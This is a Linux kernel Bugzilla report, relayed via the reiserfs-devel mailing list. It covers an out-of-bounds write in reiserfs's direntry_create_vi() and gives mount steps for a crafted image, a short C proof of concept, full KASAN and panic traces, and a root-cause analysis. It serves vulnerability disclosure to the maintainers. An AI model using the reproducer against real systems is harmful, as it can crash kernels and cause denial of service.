https://bugzilla.kernel.org/show_bug.cgi?id=200339 Bug ID: 200339 Summary: Out-of-bound access in direntry_create_vi() when opening file in reiserfs filesystem Product: File System Version: 2.5 Kernel Version: 4.18 Hardware: All OS: Linux Tree: Mainline Status: NEW Severity: normal Priority: P1 Component: ReiserFS Assignee: reiserfs-devel@xxxxxxxxxxxxxxx Reporter: wen.xu@xxxxxxxxxx Regression: No Created attachment 276993 --> https://bugzilla.kernel.org/attachment.cgi?id=276993&action=edit The (compressed) crafted image which causes crash - Reproduce (4.18) # mkdir mnt # mount -t reiserfs -o acl,user_xattr 70.img mnt # gcc -o poc poc.c # ./poc ./mnt - POC (poc.c) #define _GNU_SOURCE #include <sys/types.h> #include <sys/mount.h> #include <sys/mman.h> #include <sys/stat.h> #include <sys/xattr.h> #include <dirent.h> #include <errno.h> #include <error.h> #include <fcntl.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <linux/falloc.h> #include <linux/loop.h> static void activity(char *mpoint) { char *foo_bar_baz; int err; static int buf[8192]; memset(buf, 0, sizeof(buf)); err = asprintf(&foo_bar_baz, "%s/foo/bar/baz", mpoint); int fd = open(foo_bar_baz, O_RDWR | O_TRUNC, 0777); if (fd >= 0) { close(fd); } } int main(int argc, char *argv[]) { activity(argv[1]); return 0; } - Kernel message [ 226.995305] REISERFS (device loop0): found reiserfs format "3.6" with standard journal [ 226.995381] REISERFS (device loop0): using ordered data mode [ 226.995387] reiserfs: using flush barriers [ 226.996890] REISERFS (device loop0): journal params: device loop0, size 8192, journal first block 18, max trans len 1024, max batch 900, max commit age 30, max trans age 30 [ 226.999178] REISERFS (device loop0): checking transaction log (loop0) [ 227.816166] REISERFS (device loop0): Using r5 hash to sort names [ 244.551132] REISERFS warning: vs-16090 direntry_bytes_number: bytes number is asked for direntry [ 244.551139] REISERFS warning: vs-16090 direntry_bytes_number: bytes number is asked for direntry [ 244.551337] ================================================================== [ 244.554620] BUG: KASAN: slab-out-of-bounds in direntry_create_vi+0x1c1/0x320 [ 244.556047] Write of size 2 at addr ffff8801df5e1980 by task a.out/1365 [ 244.557746] CPU: 0 PID: 1365 Comm: a.out Not tainted 4.18.0-rc1+ #8 [ 244.557759] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014 [ 244.557768] Call Trace: [ 244.557812] dump_stack+0x7b/0xb5 [ 244.557845] print_address_description+0x70/0x290 [ 244.557850] kasan_report+0x291/0x390 [ 244.557855] ? direntry_create_vi+0x1c1/0x320 [ 244.557870] check_memory_region+0x139/0x190 [ 244.557875] __asan_storeN+0x12/0x20 [ 244.557879] direntry_create_vi+0x1c1/0x320 [ 244.557885] ? indirect_print_item+0x150/0x150 [ 244.557893] create_virtual_node+0x33b/0x9d0 [ 244.557899] fix_nodes+0x2218/0x35c0 [ 244.557908] ? create_virtual_node+0x9d0/0x9d0 [ 244.557912] ? memset+0x31/0x40 [ 244.557919] reiserfs_cut_from_item+0x1e4/0xbc0 [ 244.557930] ? reiserfs_delete_solid_item+0x540/0x540 [ 244.557935] ? kasan_check_write+0x14/0x20 [ 244.557953] ? _raw_spin_lock_irqsave+0x2a/0x60 [ 244.557958] ? _raw_spin_lock+0x17/0x40 [ 244.557963] ? __asan_loadN+0xf/0x20 [ 244.557976] ? widen_string+0x2e/0x110 [ 244.557982] ? __asan_loadN+0xf/0x20 [ 244.558009] ? pvclock_clocksource_read+0xd2/0x190 [ 244.558024] ? __asan_loadN+0xf/0x20 [ 244.558030] reiserfs_do_truncate+0x34b/0x770 [ 244.558036] ? reiserfs_cut_from_item+0xbc0/0xbc0 [ 244.558043] ? journal_begin+0x10f/0x1e0 [ 244.558049] reiserfs_truncate_file+0x386/0x680 [ 244.558065] ? __wait_on_freeing_inode+0x160/0x160 [ 244.558071] ? reiserfs_new_inode+0x1180/0x1180 [ 244.558091] ? truncate_pagecache+0x66/0x70 [ 244.558097] reiserfs_setattr+0x3ad/0x69d [ 244.558102] ? sd_attrs_to_i_attrs+0x60/0x60 [ 244.558106] ? current_time+0xb3/0x110 [ 244.558110] ? timespec64_trunc+0x90/0x90 [ 244.558115] ? security_get+0x51/0x60 [ 244.558142] ? evm_inode_setattr+0x29/0xb0 [ 244.558149] notify_change+0x4e1/0x680 [ 244.558173] ? cap_inode_need_killpriv+0x2e/0x40 [ 244.558188] do_truncate+0xe8/0x160 [ 244.558193] ? do_truncate+0xe8/0x160 [ 244.558197] ? file_open_root+0x1c0/0x1c0 [ 244.558210] ? common_perm+0x290/0x290 [ 244.558218] path_openat+0x60a/0x2160 [ 244.558224] ? vfs_unlink+0x250/0x250 [ 244.558228] ? save_stack+0x46/0xd0 [ 244.558231] ? kasan_slab_alloc+0x11/0x20 [ 244.558236] ? kmem_cache_alloc+0xd1/0x1e0 [ 244.558239] ? getname_flags+0x76/0x2c0 [ 244.558243] ? getname+0x12/0x20 [ 244.558249] ? do_sys_open+0x14b/0x2c0 [ 244.558252] ? __x64_sys_open+0x4c/0x60 [ 244.558267] ? do_syscall_64+0x78/0x170 [ 244.558285] ? add_to_page_cache_lru+0x190/0x190 [ 244.558292] ? kasan_check_write+0x14/0x20 [ 244.558303] ? __mod_node_page_state+0x90/0xa0 [ 244.558309] ? kasan_check_write+0x14/0x20 [ 244.558313] ? new_slab+0x450/0x660 [ 244.558326] ? __handle_mm_fault+0x121a/0x19b0 [ 244.558333] do_filp_open+0x12b/0x1d0 [ 244.558337] ? may_open_dev+0x50/0x50 [ 244.558342] ? kasan_kmalloc+0xad/0xe0 [ 244.558348] do_sys_open+0x17c/0x2c0 [ 244.558352] ? do_sys_open+0x17c/0x2c0 [ 244.558357] ? filp_open+0x60/0x60 [ 244.558362] ? vm_brk+0x20/0x20 [ 244.558367] __x64_sys_open+0x4c/0x60 [ 244.558371] do_syscall_64+0x78/0x170 [ 244.558377] entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 244.558398] RIP: 0033:0x7fbd46b50040 [ 244.558400] Code: 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 83 3d 09 27 2d 00 00 75 10 b8 02 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 31 c3 48 83 ec 08 e8 7e e0 01 00 48 89 04 24 [ 244.558458] RSP: 002b:00007fff90c1c5b8 EFLAGS: 00000246 ORIG_RAX: 0000000000000002 [ 244.558471] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007fbd46b50040 [ 244.558474] RDX: 00000000000001ff RSI: 0000000000000202 RDI: 0000000000f14080 [ 244.558477] RBP: 00007fff90c1c5f0 R08: 0000000000f14010 R09: 0000000000000000 [ 244.558480] R10: 000000000000069d R11: 0000000000000246 R12: 0000000000400570 [ 244.558482] R13: 00007fff90c1c6f0 R14: 0000000000000000 R15: 0000000000000000 [ 244.558829] Allocated by task 1365: [ 244.559560] save_stack+0x46/0xd0 [ 244.559564] kasan_kmalloc+0xad/0xe0 [ 244.559568] __kmalloc+0x11f/0x240 [ 244.559572] fix_nodes+0xa53/0x35c0 [ 244.559577] reiserfs_cut_from_item+0x1e4/0xbc0 [ 244.559581] reiserfs_do_truncate+0x34b/0x770 [ 244.559585] reiserfs_truncate_file+0x386/0x680 [ 244.559589] reiserfs_setattr+0x3ad/0x69d [ 244.559592] notify_change+0x4e1/0x680 [ 244.559596] do_truncate+0xe8/0x160 [ 244.559599] path_openat+0x60a/0x2160 [ 244.559602] do_filp_open+0x12b/0x1d0 [ 244.559606] do_sys_open+0x17c/0x2c0 [ 244.559610] __x64_sys_open+0x4c/0x60 [ 244.559614] do_syscall_64+0x78/0x170 [ 244.559618] entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 244.559945] Freed by task 888: [ 244.560607] save_stack+0x46/0xd0 [ 244.560612] __kasan_slab_free+0x13c/0x1a0 [ 244.560616] kasan_slab_free+0xe/0x10 [ 244.560620] kfree+0x8c/0x1c0 [ 244.560638] skb_free_head+0x39/0x50 [ 244.560643] skb_release_data+0x1e2/0x240 [ 244.560648] skb_release_all+0x30/0x40 [ 244.560652] consume_skb+0x50/0xe0 [ 244.560656] skb_free_datagram+0x17/0x70 [ 244.560675] netlink_recvmsg+0x2db/0x700 [ 244.560688] sock_recvmsg+0x78/0x90 [ 244.560693] ___sys_recvmsg+0x1c1/0x3a0 [ 244.560696] __sys_recvmsg+0xe7/0x170 [ 244.560700] __x64_sys_recvmsg+0x48/0x50 [ 244.560704] do_syscall_64+0x78/0x170 [ 244.560708] entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 244.561053] The buggy address belongs to the object at ffff8801df5e0000 which belongs to the cache kmalloc-8192 of size 8192 [ 244.563606] The buggy address is located 6528 bytes inside of 8192-byte region [ffff8801df5e0000, ffff8801df5e2000) [ 244.566002] The buggy address belongs to the page: [ 244.566989] page:ffffea00077d7800 count:1 mapcount:0 mapping:ffff8801f6802700 index:0x0 compound_mapcount: 0 [ 244.568988] flags: 0x2ffff0000008100(slab|head) [ 244.569929] raw: 02ffff0000008100 0000000000000000 0000000100000001 ffff8801f6802700 [ 244.571487] raw: 0000000000000000 0000000080030003 00000001ffffffff 0000000000000000 [ 244.573049] page dumped because: kasan: bad access detected [ 244.574498] Memory state around the buggy address: [ 244.575473] ffff8801df5e1880: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [ 244.576939] ffff8801df5e1900: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [ 244.578393] >ffff8801df5e1980: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc [ 244.579844] ^ [ 244.580510] ffff8801df5e1a00: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc [ 244.581973] ffff8801df5e1a80: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc [ 244.583427] ================================================================== [ 244.585162] Disabling lock debugging due to kernel taint [ 244.589737] REISERFS panic (device loop0): vs-8030 create_virtual_node: virtual node space consumed [ 244.589804] ------------[ cut here ]------------ [ 244.589807] kernel BUG at fs/reiserfs/prints.c:369! [ 244.590911] invalid opcode: 0000 [#1] SMP KASAN PTI [ 244.591924] CPU: 0 PID: 1365 Comm: a.out Tainted: G B 4.18.0-rc1+ #8 [ 244.593479] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014 [ 244.595374] RIP: 0010:__reiserfs_panic+0xe2/0x130 [ 244.596322] Code: 48 89 da 48 c7 c1 20 11 94 a6 74 47 49 8d b4 24 d8 03 00 00 49 c7 c1 e0 21 9a a7 4d 89 e8 48 c7 c7 c0 12 94 a6 e8 62 a4 c7 ff <0f> 0b 48 85 db 48 89 de 48 c7 c2 20 11 94 a6 74 24 49 c7 c0 e0 21 [ 244.600125] RSP: 0018:ffff8801de0c6d98 EFLAGS: 00010286 [ 244.601190] RAX: 0000000000000057 RBX: ffffffffa693c200 RCX: 0000000000000000 [ 244.602613] RDX: 0000000000000000 RSI: 0000000000000008 RDI: ffffed003bc18da9 [ 244.604036] RBP: ffff8801de0c6e48 R08: ffffed003edc4f21 R09: ffffed003edc4f21 [ 244.605471] R10: 0000000000000004 R11: ffffed003edc4f20 R12: ffff8801f0ed8000 [ 244.606895] R13: ffffffffa693c3a0 R14: ffff8801df5e0000 R15: ffff8801df600498 [ 244.608324] FS: 00007fbd4703e700(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000 [ 244.609955] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 244.611104] CR2: 00007fbd46bdf413 CR3: 00000001de16a000 CR4: 00000000000006f0 [ 244.612537] Call Trace: [ 244.613065] ? reiserfs_debug+0x10/0x10 [ 244.613852] ? direntry_create_vi+0x28e/0x320 [ 244.614742] create_virtual_node+0x9c6/0x9d0 [ 244.615619] fix_nodes+0x2218/0x35c0 [ 244.616360] ? create_virtual_node+0x9d0/0x9d0 [ 244.617279] ? memset+0x31/0x40 [ 244.617930] reiserfs_cut_from_item+0x1e4/0xbc0 [ 244.618852] ? reiserfs_delete_solid_item+0x540/0x540 [ 244.619876] ? kasan_check_write+0x14/0x20 [ 244.620723] ? _raw_spin_lock_irqsave+0x2a/0x60 [ 244.621648] ? _raw_spin_lock+0x17/0x40 [ 244.622436] ? __asan_loadN+0xf/0x20 [ 244.623173] ? widen_string+0x2e/0x110 [ 244.623943] ? __asan_loadN+0xf/0x20 [ 244.624693] ? pvclock_clocksource_read+0xd2/0x190 [ 244.625680] ? __asan_loadN+0xf/0x20 [ 244.626416] reiserfs_do_truncate+0x34b/0x770 [ 244.627302] ? reiserfs_cut_from_item+0xbc0/0xbc0 [ 244.628261] ? journal_begin+0x10f/0x1e0 [ 244.629075] reiserfs_truncate_file+0x386/0x680 [ 244.630002] ? __wait_on_freeing_inode+0x160/0x160 [ 244.630978] ? reiserfs_new_inode+0x1180/0x1180 [ 244.631899] ? truncate_pagecache+0x66/0x70 [ 244.632767] reiserfs_setattr+0x3ad/0x69d [ 244.633590] ? sd_attrs_to_i_attrs+0x60/0x60 [ 244.634463] ? current_time+0xb3/0x110 [ 244.635235] ? timespec64_trunc+0x90/0x90 [ 244.636058] ? security_get+0x51/0x60 [ 244.636824] ? evm_inode_setattr+0x29/0xb0 [ 244.637661] notify_change+0x4e1/0x680 [ 244.638436] ? cap_inode_need_killpriv+0x2e/0x40 [ 244.639374] do_truncate+0xe8/0x160 [ 244.640092] ? do_truncate+0xe8/0x160 [ 244.640857] ? file_open_root+0x1c0/0x1c0 [ 244.641681] ? common_perm+0x290/0x290 [ 244.642450] path_openat+0x60a/0x2160 [ 244.643201] ? vfs_unlink+0x250/0x250 [ 244.643951] ? save_stack+0x46/0xd0 [ 244.644678] ? kasan_slab_alloc+0x11/0x20 [ 244.645500] ? kmem_cache_alloc+0xd1/0x1e0 [ 244.646335] ? getname_flags+0x76/0x2c0 [ 244.647115] ? getname+0x12/0x20 [ 244.647780] ? do_sys_open+0x14b/0x2c0 [ 244.648546] ? __x64_sys_open+0x4c/0x60 [ 244.649346] ? do_syscall_64+0x78/0x170 [ 244.650138] ? add_to_page_cache_lru+0x190/0x190 [ 244.651075] ? kasan_check_write+0x14/0x20 [ 244.651908] ? __mod_node_page_state+0x90/0xa0 [ 244.652823] ? kasan_check_write+0x14/0x20 [ 244.653660] ? new_slab+0x450/0x660 [ 244.654378] ? __handle_mm_fault+0x121a/0x19b0 [ 244.655284] do_filp_open+0x12b/0x1d0 [ 244.656037] ? may_open_dev+0x50/0x50 [ 244.656803] ? kasan_kmalloc+0xad/0xe0 [ 244.657576] do_sys_open+0x17c/0x2c0 [ 244.658311] ? do_sys_open+0x17c/0x2c0 [ 244.659079] ? filp_open+0x60/0x60 [ 244.659780] ? vm_brk+0x20/0x20 [ 244.660428] __x64_sys_open+0x4c/0x60 [ 244.661191] do_syscall_64+0x78/0x170 [ 244.661946] entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 244.662966] RIP: 0033:0x7fbd46b50040 [ 244.663694] Code: 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 83 3d 09 27 2d 00 00 75 10 b8 02 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 31 c3 48 83 ec 08 e8 7e e0 01 00 48 89 04 24 [ 244.667515] RSP: 002b:00007fff90c1c5b8 EFLAGS: 00000246 ORIG_RAX: 0000000000000002 [ 244.669054] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007fbd46b50040 [ 244.670497] RDX: 00000000000001ff RSI: 0000000000000202 RDI: 0000000000f14080 [ 244.671941] RBP: 00007fff90c1c5f0 R08: 0000000000f14010 R09: 0000000000000000 [ 244.673390] R10: 000000000000069d R11: 0000000000000246 R12: 0000000000400570 [ 244.674830] R13: 00007fff90c1c6f0 R14: 0000000000000000 R15: 0000000000000000 [ 244.676279] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hwdep snd_hda_core snd_pcm snd_timer snd mac_hid i2c_piix4 soundcore ib_iser rdma_cm iw_cm ib_cm ib_core iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx raid1 raid0 multipath linear 8139too qxl drm_kms_helper crct10dif_pclmul syscopyarea sysfillrect sysimgblt fb_sys_fops ttm crc32_pclmul aesni_intel drm aes_x86_64 crypto_simd cryptd glue_helper 8139cp mii pata_acpi floppy [ 244.686114] ---[ end trace 2e85051acb5f6dc1 ]--- [ 244.687077] RIP: 0010:__reiserfs_panic+0xe2/0x130 [ 244.688073] Code: 48 89 da 48 c7 c1 20 11 94 a6 74 47 49 8d b4 24 d8 03 00 00 49 c7 c1 e0 21 9a a7 4d 89 e8 48 c7 c7 c0 12 94 a6 e8 62 a4 c7 ff <0f> 0b 48 85 db 48 89 de 48 c7 c2 20 11 94 a6 74 24 49 c7 c0 e0 21 [ 244.691982] RSP: 0018:ffff8801de0c6d98 EFLAGS: 00010286 [ 244.693185] RAX: 0000000000000057 RBX: ffffffffa693c200 RCX: 0000000000000000 [ 244.694617] RDX: 0000000000000000 RSI: 0000000000000008 RDI: ffffed003bc18da9 [ 244.696078] RBP: ffff8801de0c6e48 R08: ffffed003edc4f21 R09: ffffed003edc4f21 [ 244.697534] R10: 0000000000000004 R11: ffffed003edc4f20 R12: ffff8801f0ed8000 [ 244.698969] R13: ffffffffa693c3a0 R14: ffff8801df5e0000 R15: ffff8801df600498 [ 244.700435] FS: 00007fbd4703e700(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000 [ 244.702077] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 244.703240] CR2: 00007fbd46bdf413 CR3: 00000001de16a000 CR4: 00000000000006f0 - Reason https://elixir.bootlin.com/linux/v4.18-rc1/source/fs/reiserfs/item_ops.c#L493 Regarding kernel message, here, for (i = 0; i < dir_u->entry_count; i++) { j = old_entry_num(is_affected, i, vn->vn_pos_in_item, vn->vn_mode); dir_u->entry_sizes[i] = (j ? deh_location(&deh[j - 1]) : ih_item_len(vi->vi_ih)) - deh_location(&deh[j]) + DEH_SIZE; } In this loop, i moves out of the boundary of dir_u->entry_sizes which leads to KASAN alert. Reported by Wen Xu (wen.xu@xxxxxxxxxx) from SSLab at Gatech. -- You are receiving this mail because: You are the assignee for the bug.-- To unsubscribe from this list: send the line "unsubscribe reiserfs-devel" in the body of a message to majordomo@xxxxxxxxxxxxxxx More majordomo info at http://vger.kernel.org/majordomo-info.html
